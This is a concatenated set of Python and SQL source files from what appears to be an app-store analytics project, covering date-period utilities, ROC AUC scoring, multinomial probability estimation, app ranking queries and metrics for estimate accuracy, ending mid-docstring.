:param period_start: datetime.date with period start
:param period_end: datetime.date with period start
:param time_frame: time frame ('weekly' or 'monthly')
:return: list with datetime.date objects
"""
validate_start_date(period_start, time_frame)
validate_start_date(period_end, time_frame)
if time_frame == 'weekly':
timestamp_range = pd.date_range(period_start, period_end, freq='W')
elif time_frame == 'monthly':
        # Add a month because monthly intervals are not inclusive on both sides;
        # roll the year over when the period ends in December
        if period_end.month == 12:
            end_month = period_end.replace(year=period_end.year + 1, month=1)
        else:
            end_month = period_end.replace(month=period_end.month + 1)
timestamp_range = pd.date_range(period_start, end_month, freq='M')
timestamp_range = timestamp_range.shift(n=-1, freq='M').shift(n=1, freq='d')
else:
raise Exception('Unknown time frame: %s' % time_frame)
return timestamp_range.date
def validate_start_date(start_date, time_frame):
"""
Check if the start_date is valid.
:param start_date: datetime.date with period start
:param time_frame: time frame ('weekly' or 'monthly')
:return: None
"""
is_valid = check_date(start_date, time_frame, 'start')
if not is_valid:
if time_frame == 'weekly':
raise Exception('Date should be a Sunday')
elif time_frame == 'monthly':
raise Exception('Date should be first day of the month')
def validate_end_date(end_date, time_frame):
"""
Check if the end_date is valid.
:param end_date: datetime.date with period end
:param time_frame: time frame ('weekly' or 'monthly')
:return: None
"""
is_valid = check_date(end_date, time_frame, 'end')
if not is_valid:
if time_frame == 'weekly':
raise Exception('Date should be a Saturday')
elif time_frame == 'monthly':
raise Exception('Date should be last day of the month')
def check_date(date, time_frame, kind):
"""
Check start or end date.
:param date: datetime.date to check
:param time_frame: time frame to check ('weekly' or 'monthly')
:param kind: kind of date 'start' or 'end'
:return: boolean indicating if it's a valid date
"""
if time_frame == 'weekly' and kind == 'start':
is_valid = (date.isoweekday() == 7)
elif time_frame == 'monthly' and kind == 'start':
is_valid = (date.day == 1)
elif time_frame == 'weekly' and kind == 'end':
is_valid = date.isoweekday() == 6
elif time_frame == 'monthly' and kind == 'end':
next_month = [(date.month + 1) % 12, date.year + (date.month + 1 - 1) / 12]
if next_month[0] == 0:
next_month[0] = 12
last_date_of_month = (date.replace(day=1, month=next_month[0], year=next_month[1]) -
datetime.timedelta(days=1))
is_valid = (date == last_date_of_month)
else:
raise Exception('Unknown time frame or kind: %s, %s' % (time_frame, kind))
return is_valid
def get_weekly_end_dates_in_month(month_end):
"""
Get all end dates of weekly periods that are contained within the month.
:param month_end: Last date of the month
:return: List with end_dates for the weeks fully contained in the month
"""
month_start = get_start_date(month_end, 'monthly')
week_end = month_start
valid_week_ends = []
while week_end <= month_end:
is_valid_end_date = check_date(week_end, 'weekly', 'end')
if is_valid_end_date:
week_start = get_start_date(week_end, 'weekly')
if week_start >= month_start:
valid_week_ends.append(week_end)
week_end += datetime.timedelta(days=1)
return valid_week_ends
def multiclass_roc_auc_score(y_true, y_score, label_binarizer=None, **kwargs):
"""
Compute ROC AUC score for multiclass.
:param y_true: true multiclass predictions [n_samples]
:param y_score: multiclass scores [n_samples, n_classes]
:param label_binarizer: Binarizer to use (sklearn.preprocessing.LabelBinarizer())
:param kwargs: Additional keyword arguments for sklearn.metrics.roc_auc_score
:return: Multiclass ROC AUC score
"""
if label_binarizer is None:
label_binarizer = sklearn.preprocessing.LabelBinarizer()
binarized_true = label_binarizer.fit_transform(y_true)
score = sklearn.metrics.roc_auc_score(binarized_true, y_score, **kwargs)
return score
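# Minimal usage sketch for multiclass_roc_auc_score (toy data, illustrative):
def _example_multiclass_auc():
    y_true = ['a', 'b', 'c', 'a', 'b', 'c']
    y_score = np.array([[0.8, 0.1, 0.1],
                        [0.2, 0.6, 0.2],
                        [0.1, 0.2, 0.7],
                        [0.5, 0.3, 0.2],
                        [0.3, 0.5, 0.2],
                        [0.2, 0.2, 0.6]])
    # Labels are binarized internally, then ROC AUC is computed on the scores.
    return multiclass_roc_auc_score(y_true, y_score)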
def get_week_end(date):
"""
    Get the last Saturday of the week containing the given date.
    :param date: datetime.date for which the last Saturday of the week is calculated
    :return: datetime.date of the Saturday ending that week
"""
return date + datetime.timedelta(days = 6 - (date + datetime.timedelta(days=1)).weekday())
def dataframe_size(df):
"""
Return a dict with the size of DataFrame components in MB.
:param df: pandas.DataFrame
:return dictionary with index, columns, values and total size
"""
byte_megabyte_factor = 1024 ** 2
size = dict(zip(['index', 'columns', 'values'],
np.array([df.index.nbytes, df.columns.nbytes,
df.values.nbytes]) / byte_megabyte_factor))
size['total'] = np.sum(size.values())
return size
def prettify_app_name(app_name, n_words=5, max_char=20):
"""
    Prettify app name for output. Cuts the app name off at a maximum number of words and characters.
:param app_name: String with app name
:param n_words: Maximum allowed number of words
:param max_char: Maximum allowed number of characters
:return: String
"""
if type(app_name) in (str, unicode):
without_dashes = app_name.replace('-', '')
first_words_fcn = lambda x: ' '.join(x[:n_words]) if type(x) is list else '-'
first_words = first_words_fcn(without_dashes.split())
if len(first_words) > max_char:
truncated = first_words[:max_char] + '...'
else:
truncated = first_words
else:
truncated = '-'
    truncated = truncated.decode(errors='ignore')  # Fix ASCII/unicode errors
return truncated
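# Worked example (values verified against the logic above):
#
#   prettify_app_name('my-app: the best photo editor in the world')
#   -> u'myapp: the best phot...'
#
# Dashes are stripped, the first 5 words are kept ('myapp: the best photo
# editor'), and since that exceeds 20 characters it is truncated with '...'.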
class OrderedLabelEncoder(preprocessing.LabelEncoder):
"""Encode labels with value between 0 and n_classes-1 in specified order.
See also
--------
sklearn.preprocessing.LabelEncoder
"""
def __init__(self, classes):
self.classes_ = np.array(classes, dtype='O')
def fit(self, y):
""" Deprecated method.
"""
raise Exception('Invalid method: method is deprecated')
def fit_transform(self, y):
""" Deprecated method.
"""
raise Exception('Invalid method: method is deprecated')
def transform(self, y):
"""Transform labels to normalized encoding.
Parameters
----------
y : array-like of shape [n_samples]
Target values.
Returns
-------
y : array-like of shape [n_samples]
"""
self._check_fitted()
classes = np.array(np.unique(y), dtype='O')
preprocessing.label._check_numpy_unicode_bug(classes)
if len(np.intersect1d(classes, self.classes_)) < len(classes):
diff = np.setdiff1d(classes, self.classes_)
raise ValueError("y contains new labels: %s" % str(diff))
transformed_y = np.zeros_like(y, dtype=int)
for i_class, current_class in enumerate(self.classes_):
transformed_y[np.array(y) == current_class] = i_class
return transformed_y
<file_sep>/evaluation/py/generate_plots.py
"""
@Note: The range starts from 1
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
from optparse import OptionParser
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
def parse_options():
parser = OptionParser()
parser.add_option("-r", "--rankrange", dest="rank_range",
help="Required. The range of ranks (by unit values) that we care. START FROM 1. e.g. 1-100")
(opts, args) = parser.parse_args()
opts.rank_range = map(int, opts.rank_range.split('-'))
return (opts, args)
def main():
(opts, args) = parse_options()
input_dir = args[0]
output_dir = args[1]
# It should contain both estimation and real values.
estreal_files = filter(lambda s: s.endswith('.csv'), os.listdir(input_dir))
for f in estreal_files:
input_full_path = os.path.join(input_dir, f)
output_full_path = os.path.join(output_dir, f)
_generate_plots(pd.read_csv(input_full_path), output_full_path.replace('.csv', '.png'),
rank_range=opts.rank_range,
title=f)
def _generate_plots(df, output_file, rank_range, title):
df_top = df.sort('units', ascending=False)[(rank_range[0] - 1):rank_range[1]]
def _real_vs_est_plot():
plt.figure()
ax = plt.subplot(111)
# Plot points
plt.plot(df_top['units'].values, df_top['estimate'].values, '.', markersize=12, alpha=0.4)
# Plot the line y = x
x1, x2, y1, y2 = plt.axis()
xx = np.linspace(x1, x2)
plt.plot(xx, xx, 'k--')
plt.xlabel("Real Values")
plt.ylabel("Estimation")
plt.title(title)
plt.savefig(output_file.replace(".png", "_RvsE.png"))
ax.set_xscale('log')
ax.set_yscale('log')
plt.savefig(output_file.replace(".png", "_RvsE_log.png"))
_real_vs_est_plot()
if __name__ == '__main__':
main()
<file_sep>/audience/loaded_dice/lib/loaded_dice.py
__author__ = 'srhmtonk'
import numpy as np
def estimate_p(x, prior='Jeffreys'):
'''
    Estimate the event probabilities p for each set of event counts x, assuming each set of counts comes from a
    multinomial distribution.
:param x: array-like, shape (n_observations, n_events)
Array containing the different observed event counts.
:param prior: string, optional
        String specifying the prior used when estimating the event probabilities from a drawn sample. Currently
        only Jeffreys' prior is supported; any other value falls back to the ML estimate instead of the
        posterior (defaults to 'Jeffreys')
:return: numpy arrays, shape (n_observations,n_events)
Array giving the estimated event probabilities for each observed set of counts.
'''
if type(x) is not np.ndarray:
x = np.array(x).astype(float)
if prior=='Jeffreys':
#add Jeffrey's prior
x = np.array(x) + 0.5
if x.ndim==1:
# only one observed set of counts
return x/x.sum()
else:
# multiple sets of observed counts, an estimate is made for each set of count independently
return x/np.tile(x.sum(axis=1)[:,np.newaxis],(1,x.shape[1]))
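# Minimal usage sketch (toy counts; each row is an independent observation):
def _example_estimate_p():
    x = [[10, 8, 12, 9, 11, 10],   # a fairly balanced die
         [30, 1, 2, 1, 2, 1]]      # a loaded die
    # With the default Jeffreys prior each count gets +0.5 before
    # normalising, so every row of the result sums to 1.
    return estimate_p(x)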
def estimate_ci(p, n, samples_size=1000000, prior='Jeffreys', confidence=95):
'''
Compute confidence interval for multinomial with given p and n by:
- sampling from the distribution
- computing estimates on p from these samples
    - determining the set of nearest (Euclidean distance) samples that fall within the confidence interval
- computing confidence bounds from the largest differences between true and samples event probabilities
:param p: array-like, shape (n_events)
Vector containing the event probabilities.
:param n: integer
Number of trials.
:param samples_size: integer, optional
        Number of samples drawn from the multinomial used for determining the CI (defaults to 1000000).
    :param prior: string, optional
        String specifying the prior used when estimating the event probabilities from a drawn sample. Currently
        only Jeffreys' prior is supported; any other value falls back to the ML estimate instead of the
        posterior (defaults to 'Jeffreys')
:param confidence: float, in range of [0,100]
Percentile to compute which must be between 0 and 100 inclusive (defaults to 95).
:return: tuple of numpy arrays, shape (n_events)
Two arrays giving the maximum absolute confidence ranges in negative and positive direction
'''
    # sample from multinomial with n=number of trials and p=event probabilities
X = np.random.multinomial(n, p, size=samples_size)
# compute event probabilities for each sample
P = estimate_p(X, prior=prior)
    # determine Euclidean distance between sampled and true event probabilities
d = np.sqrt(np.sum((P-np.tile(p,(samples_size,1)))**2, axis=1))
# determine max distance such that confidence percentage of the sampled event probabilities falls within that
# boundary
d_max = np.percentile(d, confidence)
sel_ci=(d<=d_max)
n_ci = sel_ci.sum()
# compute the max absolute probability differences between event probabilities of true and sampled events for
# all those samples that fall within the confidence interval
p_diff = np.max(np.abs(P[sel_ci,:]-np.tile(p[np.newaxis,:],(n_ci,1))), axis=0)
# determine the min and max probabilities per event by adding/subtracting the max absolute probability differences
# from the true p, using a cutoff at p_i=0 or p_i=1
p_min = p-p_diff
p_min[p_min<0] = 0
p_max = p+p_diff
p_max[p_max>1] = 1
#return negative and positive confidence ranges
return p-p_min, p_max-p<file_sep>/financial-product-benchmark/combined-sample_size/sql_files/get_analytics_apps_appstore.sql
-- SET @country_list:='JP,NL';
-- SET @start_date:='2014-01-01';
-- SET @rank_limit := 400;
DROP TEMPORARY TABLE IF EXISTS temp.top100_gross;
SET @select_apps_stmtn_prepare := CONCAT(
'CREATE TEMPORARY TABLE temp.top100_gross
(CONSTRAINT PRIMARY KEY (appstore_instance_id,type,application_id))
SELECT
x1.*
FROM (
SELECT
x.iso_code,
x.device,
x.type,
x.external_id,
IF( @prev=CONCAT(\'1\',\'-\',x.iso_code,\'-\',x.device,\'-\',x.type),
@rank := @rank+1,
@rank := 1 AND (@prev:=CONCAT(\'1\',\'-\',x.iso_code,\'-\',x.device,\'-\',x.type))
) as rank,
x.name,
x.publisher,
x.application_id,
x.appstore_instance_id
FROM (
SELECT
cn.iso_code,
t.type,
IF(ai.device_id =1 , \'iPhone\', \'iPad\') as device,
a.external_id,
a.name,
a.publisher,
e.application_id,
e.appstore_instance_id,
sum(IF(t.type=\'gross\',e.revenue, e.downloads)) as value
FROM estimates_dev.estimates_month_appstore e
JOIN appstore.appstore_instances ai ON ai.id = e.appstore_instance_id
JOIN appstore.countries cn ON cn.id = ai.country_id
JOIN appstore.applications a ON a.id = e.application_id
JOIN (select \'gross\' as type UNION select \'paid\' as type) t
WHERE
e.date = \'',@start_date,'\' AND
FIND_IN_SET(UPPER(cn.iso_code),@country_list) AND
ai.device_id in (1,2) AND
(t.type = \'gross\' OR (type=\'paid\' AND e.estimate_type=\'paid_downloads\') )
GROUP BY cn.iso_code, ai.device_id, t.type, e.application_id
ORDER BY iso_code, device, type, value DESC
) x, (SELECT @rank:=0, @prev:=\'\') dummy
) x1
WHERE
x1.rank<=',@rank_limit)
;
PREPARE select_apps_stmtn FROM @select_apps_stmtn_prepare;
EXECUTE select_apps_stmtn;
DROP TEMPORARY TABLE IF EXISTS temp.select_dates;
CREATE TEMPORARY TABLE temp.select_dates
SELECT
DISTINCT(date)
FROM
appstore.downloads
WHERE
date < DATE_ADD(DATE(@start_date), INTERVAL 1 MONTH)
AND date>=@start_date
;
SELECT
@start_date as start_date,
DATE_SUB(DATE_ADD(DATE(@start_date),INTERVAL 1 MONTH), INTERVAL 1 DAY) as end_date,
t.iso_code,
t.type,
t.device,
t.external_id,
t.application_id,
t.rank,
t.name,
t.publisher,
SUM(IFNULL(d.application_id, 0))>0 as d_analytics_app
FROM
temp.top100_gross t
JOIN appstore.countries cn ON
cn.iso_code = t.iso_code
JOIN appstore.appstore_instances ai ON
cn.id = ai.country_id
JOIN temp.select_dates dt
LEFT JOIN appstore.downloads d ON
d.application_id = t.application_id
AND d.appstore_instance_id = ai.id
AND dt.date = d.date
GROUP BY t.appstore_instance_id,t.type, t.application_id
ORDER BY t.appstore_instance_id,t.type, t.rank
;<file_sep>/audience/loaded_dice/lib/__init__.py
__author__ = 'srhmtonk'
<file_sep>/old_investigations/estimates_quality.py
'''
Created on Jan 18, 2013
@author: perezrafael
'''
import pandas as pd
import os, os.path
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import statsmodels.api as sm
import numpy as np
from internal.stores_dict import category_dict
from internal.stores_dict import market_dict
from internal.stores_dict import type_dict
from internal.stores_dict import country_dict
from public_company_apps import public_company_apps
from scipy.stats import ks_2samp
import cProfile
import time
public_company_apps_b = pd.DataFrame({'app_id':list(public_company_apps)})
#COUNTRIES = ['143441', '143465', '143462', '143466']
CATEGORIES = []
FEEDS = []
COUNTRIES = ['143465']
#COUNTRIES = ['10', '3', '9', '27']
MONTH = '2012-07'
#DATE = '2012-07-01'
DATE = None
DATA_DIR = '/Users/perezrafael/appannie/data'
ESTIMATES_DIR = '/Users/perezrafael/appannie/data/cache/raw_estimation_lowess_monthly'
REFERENCES_DIR = '/Users/perezrafael/appannie/data/cache/references'
OUT_FILE = '%s/metrics_lowess_monthly_ALL_estimates_2013-03-26.csv'%DATA_DIR
METRIC_COLUMNS = [
'% of Top 20 analytics apps over 20% error',
'% of Top 200 analytics apps over 20% error',
'% of Top 200 analytics apps over 10% and 100 units error',
'% of 201-1000 ranked apps 20% error',
'% of all apps over 10% and 100 units error',
'Repetition ratio by date',
'Repetition ratio by rank',
#'Median 7 days autocorrelation',
'Top20 Median absolute error',
'Top20 Median relative error',
'Top20 % of actuals from estimates',
'21-200 Median absolute error',
'21-200 Median relative error',
'21-200 % of actuals from estimates',
'201-1000 Median absolute error',
'201-1000 Median relative error',
'201-1000 % of actuals from estimates',
'Total Actuals count',
'Total Estimates count',
'Multiple category Estimates Mean Standard Deviation',
'Distributions similarity KS-stat',
'Distributions similarity p-value',
'Date',
'Country',
'Category',
'Feed',
'Model',
'Range']
METRICS = [pd.DataFrame(columns=METRIC_COLUMNS)]
def append_diff(df):
"""
    Calculate the difference between real values and SBE
    and add the error columns to the DataFrame.
"""
if 'sbe' in df.columns:
df['diff'] = df['units'] - df['sbe']
else:
df['diff'] = df['units'] - df['estimate']
df['absolute_diff'] = df['diff'].abs()
df['relative_diff'] = (df['absolute_diff']*1.0) / df['units']
df['absolute_r2'] = df['absolute_diff'] ** 2
df['relative_r2'] = df['relative_diff'] ** 2
return df
def append_sbe(df, unit):
"""
Calculate SBE per date-country-app
"""
gdf = df.groupby(['store_id', 'date', 'feed_id', 'app_id'])['estimate'].mean()
gdf = gdf.reset_index()
if unit=='downloads':
gdf = gdf[(gdf['feed_id']==0) | (gdf['feed_id']==101) | (gdf['feed_id']==1) | (gdf['feed_id']==100)]
elif unit=='usd':
gdf = gdf[(gdf['feed_id']==2) | (gdf['feed_id']==102)]
ddf = gdf.groupby(['store_id', 'date', 'app_id'])['estimate'].sum().reset_index()
ddf.rename(columns={'estimate':'sbe'}, inplace=True)
ddf = gdf.merge(ddf, on=['store_id', 'date', 'app_id'])
ddf = ddf.drop('estimate', axis=1)
df = df.merge(ddf, on=['store_id', 'date', 'app_id', 'feed_id'])
return df
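# Illustration of the aggregation above: for one (store, date, app), the SBE
# is the sum over the unit's feeds of the app's mean estimate across all
# categories in which it is ranked, restricted to the download feeds
# (0, 1, 100, 101) or the revenue feeds (2, 102) depending on `unit`.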
def error_ratio(df, max_relative_diff=0.2, max_absolute_diff=None, rank_range=[1,1000]):
"""
Range: 0-1
Optimal Value: 0
Heavy error ratio counts how many apps fall outside of two different thresholds,
max_relative_diff is the highest acceptable relative error,
    max_absolute_diff is the highest acceptable absolute error.
Apps that fall outside these maximums will be counted as heavy errors.
"""
try:
gdf = df[['date', 'app_id', 'units']].drop_duplicates().groupby(['date'])
top_apps = pd.DataFrame(columns=['date', 'app_id'])
for name, group in gdf:
group = group.dropna().sort('units', ascending=False)
group = group[rank_range[0]:rank_range[1]]
group = group[['date', 'app_id']]
top_apps = top_apps.append(group)
df = df.merge(top_apps, on=['date', 'app_id'])
df = df[['date', 'app_id', 'relative_diff', 'absolute_diff']].drop_duplicates()
df = df.groupby(['date', 'app_id']).mean().reset_index()
total_count = df.shape[0]
if max_absolute_diff is None:
error_count = df[df['relative_diff']>=max_relative_diff].shape[0]
else:
error_count = df[(df['relative_diff']>=max_relative_diff) & (df['absolute_diff']>=max_absolute_diff)].shape[0]
score = (error_count*1.0)/total_count
except:
return None
return score
def get_error_metrics(df, rank_range=[1,1000]):
"""
Basic error metrics based on distance between
estimates and real values.
The lower these are the more accurate the model is.
"""
metrics = [None, None, None, None, None, None, None]
try:
df = df[(df['rank']>=rank_range[0]) & (df['rank']<=rank_range[1])]
actuals_count = df[df['units']>=0][['app_id', 'units']].drop_duplicates().shape[0]
if 'sbe' in df.columns:
estimates_count = df[df['sbe']>=0][['app_id','sbe']].drop_duplicates().shape[0]
else:
estimates_count = df[df['estimate']>=0][['app_id','estimate']].drop_duplicates().shape[0]
actuals_ratio = actuals_count*1.0/estimates_count
df = df.dropna()
df = df.groupby(['date', 'app_id']).mean().reset_index()
metrics = [
df['relative_diff'].max(),
df['absolute_diff'].max(),
df['relative_r2'].median(),
df['absolute_r2'].median(),
df['absolute_diff'].median(),
df['relative_diff'].median(),
actuals_ratio]
except:
return metrics
return metrics
def repetition_ratio(df, by='date'):
"""
Range: 0-1
Optimal value: 0
Repetition ratio measures how many estimates were repeated
    either by date or by rank.
    The algorithm should not generate the same estimate for
    two different ranks on the same date, nor for
    two different dates at the same rank.
"""
df = df[['date', 'store_id', 'rank','category_id', 'feed_id', 'estimate']]
total_estimates = df.shape[0]
df_estimates = df.groupby(['store_id','category_id', 'feed_id', by, 'estimate']).size()
repeated_estimates = df_estimates[df_estimates>1].sum()
repetition_ratio = (repeated_estimates*1.0)/total_estimates
return repetition_ratio
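# Worked illustration: if 100 estimates are produced and one
# (store, category, feed, date) combination yields the same estimate value
# for 3 different ranks, those 3 rows count as repeated, giving 3/100 = 0.03.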
def incompleteness_ratio(df, target_estimates):
"""
Range: 0-1
Optimal value: 0
    Incompleteness ratio measures how many estimates the algorithm missed;
    ideally it should generate estimates for all ranks,
    but due to lack of data (not enough actuals, ranks, etc.)
    this is not always possible.
"""
incompleteness = 1.0 - ((df.shape[0]*1.0)/target_estimates)
return incompleteness
def load_estimates(estimates_dir, month, country, other=None):
"""
Read estimates from CSV files and aggregate into DataFrame
"""
estimates = pd.DataFrame(columns=['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id'])
country = '%s_'%country
month = '_%s'%month
for root, dirs, files in os.walk(estimates_dir):
for f in files:
if country in f and month in f and '.csv' in f:
if other is not None and '%s.csv'%other not in f:
continue
fullpath = os.path.join(root, f)
df = pd.read_csv(fullpath)
if df.shape[0]>0:
estimates = estimates.append(df)
return estimates
def plot_actuals_vs_estimates(df, fig_file=None, which='downloads', rank_range=[1,1000]):
"""
Plotting function
"""
df = df[(df['rank']>=rank_range[0]) & (df['rank']<=rank_range[1])]
df = df[['sbe', 'units', 'date', 'app_id', 'store_id']]
df.drop_duplicates(inplace=True)
plt.plot(df['units'], df['sbe'], 'b.', alpha=0.4)
plt.plot(df['units'], df['units'], 'r')
plt.grid(True, which='both')
plt.xlabel(which)
plt.ylabel('SBE')
plt.title('%s VS SBE'%which)
plt.savefig(fig_file)
def median_autocorrelation(df, which='downloads', expected_cycle=7, by='rank', fig_file=None):
"""
Calculate autocorrelation of estimates by rank or date.
Higher autocorrelation at the expected cycle means
    the model is following a cyclical trend,
    e.g. more downloads on weekends.
"""
gdf = df[['store_id', 'category_id', 'feed_id', by, 'estimate']]
gdf = gdf.groupby(['store_id', 'category_id', 'feed_id', by])
corr_array = []
for estimates in gdf['estimate'].values:
autocorrelation = sm.tsa.stattools.acf(estimates)
for i in range(len(autocorrelation)):
if len(corr_array) == i:
corr_array.append([])
corr_array[i].append(np.abs(autocorrelation[i]))
if fig_file is not None:
plt.clf()
ax = plt.subplot(111)
ax.boxplot(corr_array)
ax.set_xticklabels(range(len(corr_array)))
#plt.grid(True, axis='x')
plt.xlabel('Lag')
plt.ylabel('Autocorrelation')
plt.title('Autocorrelation of %s estimates series by country, category, feed, %s'%(which, by))
plt.savefig(fig_file)
median_ac = np.median(corr_array[expected_cycle])
return median_ac
def plot_app_series(df, top=50, which='downloads', what='sbe', fig_file=None):
dates = pd.DataFrame({'date':df['date'].drop_duplicates()})
fdf = select_downloads_or_usd(df, unit=which)
fdf = fdf[['date', 'app_id', what]].drop_duplicates()
day_count = fdf.groupby('app_id').size().reset_index()
day_count = day_count[day_count[0]==dates.shape[0]][['app_id']]
#fdf = fdf.merge(day_count, on='app_id')
top_apps = fdf.groupby('app_id')[what].max().reset_index()
top_apps = top_apps.dropna().sort(what, ascending=False)
top_apps = top_apps[:top][['app_id']]
fdf = fdf.merge(top_apps, on='app_id')
fdf = fdf.groupby('app_id')
plt.clf()
for app_data in fdf:
app_data = app_data[1].sort('date')
#if app_data.shape[0]==dates.shape[0]:
app_data = app_data.merge(dates, on='date', how='outer').sort('date').reset_index()
if what=='sbe':
plt.plot(app_data.index, app_data[what])
elif what=='units':
plt.plot(app_data.index, app_data[what], '.')
plt.xlabel('Day')
plt.ylabel(what)
plt.title(fig_file)
plt.savefig(fig_file)
def append_universal(df):
"""
Calculate which apps are universally ranked and add a flag to the DataFrame.
    This function differs from the production model in that
    it only flags as universal an app that is ranked on different devices
    on the same day, and only for that day.
"""
universals_dir = '%s/cache/universals'%DATA_DIR
if not os.path.exists(universals_dir):
os.makedirs(universals_dir)
index_df = df['date'].drop_duplicates()
flag = False
for date in index_df:
try:
df1 = pd.read_csv('%s/%s_%s.csv'%(universals_dir, CURRENT_COUNTRY, date))
df1['universal'] = 1
df = df.merge(df1, on=['app_id', 'date'], how='left')
flag = True
except:
flag = False
if flag:
return df
rdf = df
universals = pd.DataFrame(columns=['date', 'app_id', 'feed_id', 'category_id', 'rank', 'estimate', 'units', 'universal'])
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
cdf = df[df['category_id']==category][['date', 'app_id', 'feed_id', 'category_id']]
fdf = cdf[(cdf['feed_id']==0) | (cdf['feed_id']==101)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['category_id'] = category
fdf['feed_id'] = 0
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 101
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==1) | (cdf['feed_id']==100)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 1
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 100
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==2) | (cdf['feed_id']==102)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 2
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 102
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
universals = universals[['date', 'category_id', 'feed_id', 'app_id', 'universal']]
rdf = rdf.merge(universals, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
gdf = rdf[rdf['universal'] == 1][['date', 'app_id']].drop_duplicates().groupby(['date'])
for date, group in gdf:
group.to_csv('%s/%s_%s.csv'%(universals_dir, CURRENT_COUNTRY, date), index=False)
return rdf
def append_estimates(df, estimates, unit='downloads'):
"""
    Filter the estimates to the feeds for the requested unit and merge them onto the actuals frame.
"""
if unit=='downloads':
estimates = estimates[(estimates['feed_id']==0) | (estimates['feed_id']==101) | (estimates['feed_id']==1) | (estimates['feed_id']==100)]
elif unit=='usd':
estimates = estimates[(estimates['feed_id']==2) | (estimates['feed_id']==102)]
df = df.rename(columns={'revenue':'units'})
else:
return 0
df = df.merge(estimates, on=['date', 'app_id'], how='right')
return df
def plot_daily_curve(df, plots_dir, model_name):
gdf = df.groupby(['date', 'store_id', 'category_id', 'feed_id'])
full_dir = '%s/%s'%(plots_dir, model_name)
if not os.path.exists(full_dir):
os.makedirs(full_dir)
for name, group in gdf:
plt.clf()
ax = plt.subplot(111)
p1, = plt.plot(group['rank'], group['estimate'], 'r.', alpha=0.9)
if 'universal' in group.columns:
universals = group[group['universal'] == 1]
p2, = plt.plot(group['rank'], group['units'], 'b.', alpha=0.9)
if 'universal' in group.columns:
p3, = plt.plot(universals['rank'], universals['units'], 'g^', alpha=0.9)
plt.xlabel('Rank')
ax.set_xscale('log')
ax.set_yscale('log')
if 'universal' in group.columns:
plt.legend([p1, p2, p3], ['Estimates', 'Actuals', 'Universals'])
else:
plt.legend([p1, p2], ['Estimates', 'Actuals'])
title= '%s_%s_%s_%s_%s_%s_%s_curve'%(name[0], country_dict[name[1]], name[2],category_dict[name[2]], market_dict[name[3]], type_dict[name[3]], model_name)
plt.title(title)
plt.savefig('%s/%s.png'%(full_dir, title))
def to_vw_string(x, name):
return '%s:%s'%(x,name)
def format_to_vw(df, date, country, unit):
df = df[df['date']==date]
df['date'] = df.apply(lambda x: x['date'].replace('-',''), axis=1)
df = df[['units', 'category_id', 'feed_id', 'rank', 'app_id']]
df['app_id'] = np.int64(df['app_id'])
train = df[df['units']>=0]
for column in train.columns:
if column=='units':
train[column] = df.apply(lambda x: '%s |' % (x[column]), axis=1)
else:
train[column] = df.apply(lambda x: '%s:%s' % (column, x[column]), axis=1)
train.to_csv('%s_%s_%s_vw_train.txt'%(date, country, unit), sep=' ', header=False, index=False)
test = df
for column in test.columns:
if column=='units':
test[column] = df.apply(lambda x: '%s |' % (x[column]), axis=1)
else:
test[column] = df.apply(lambda x: '%s:%s' % (column, x[column]), axis=1)
test.to_csv('%s_%s_%s_vw_test.txt'%(date, country, unit), sep=' ', header=False, index=False)
def compare_estimates(df):
"""
Range: 0~
Smaller values are better.
Generate Standard Deviation of estimates per date-store-app-feed.
    That is, the standard deviation of the estimates
from different categories for the same app.
Smaller STD represents less variation in estimates,
and could represent better accuracy.
"""
df = df[['date', 'store_id', 'app_id', 'feed_id', 'estimate']]
gdf = df.groupby(['date', 'store_id', 'app_id', 'feed_id'])
count = gdf.count()
total = count.shape[0]
multiple_categories = count[count['estimate']>1].shape[0]
op = gdf.std()
op = op.dropna(subset = ['estimate'])
return op['estimate'].mean()
def select_downloads_or_usd(df, columns=None, unit='downloads'):
if unit=='downloads':
df = df[(df['feed_id']==0) | (df['feed_id']==101) | (df['feed_id']==1) | (df['feed_id']==100)]
elif unit=='usd':
df = df[(df['feed_id']==2) | (df['feed_id']==102)]
else:
return
if columns is None:
df.drop_duplicates(inplace=True)
else:
df = df[columns].drop_duplicates()
return df
def compare_distributions(df, unit='downloads'):
"""
Range: 0~
